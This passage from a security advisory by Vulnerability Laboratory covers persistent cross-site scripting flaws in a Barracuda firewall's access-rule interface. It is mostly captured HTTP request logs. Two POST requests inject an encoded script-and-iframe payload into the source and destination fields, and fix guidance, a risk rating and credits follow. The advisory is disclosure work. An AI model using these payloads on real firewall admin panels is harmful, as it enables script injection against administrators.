Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.189[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.190[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]

2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:38.671[841ms][total 841ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load
Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime
Type[text/plain]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]
Content-Length[339]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_src_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Cif
rame%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fi
frame%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Tue, 01 Oct 2013 00:35:40 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]

2:35:50.213[300ms][total 300ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load
Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime
Type[text/plain]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38
094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_se
condary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale
=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_li
fe=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_h
eight=850]
Content-Length[339]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_dst_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Cif
rame%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fi
frame%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Tue, 01 Oct 2013 00:35:51 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]

Reference(s): URLs
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=6822f33a0a
0c182212b81d743623a562&et=1380586668
&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=
Local&update_type=add&locale=en_US&
secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&is
popup=1&parent_name=firewall_access_rules&
popup_width=700&popup_height=850

https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?locale=en_US

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a more secure filter and restriction
of the `redirect to` & `ip address` input field of destination and source.
Also parse the saved selected listing in the new visible listing menu
under the input fields.

Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic)
page or use the regular customer panel
https://www.barracuda.com/support/knowledgebase/501600000013gvr

Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
and filter bypass are estimated as medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]
Vulnerability Laboratory [Research Team] - Ebrahim Hegazy
(ebrahim (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect,
incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some states do not allow the exclusion or
limitation
of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or
trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] -
admin (at) evolution-sec (dot) com [email concealed]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com -
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a
permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus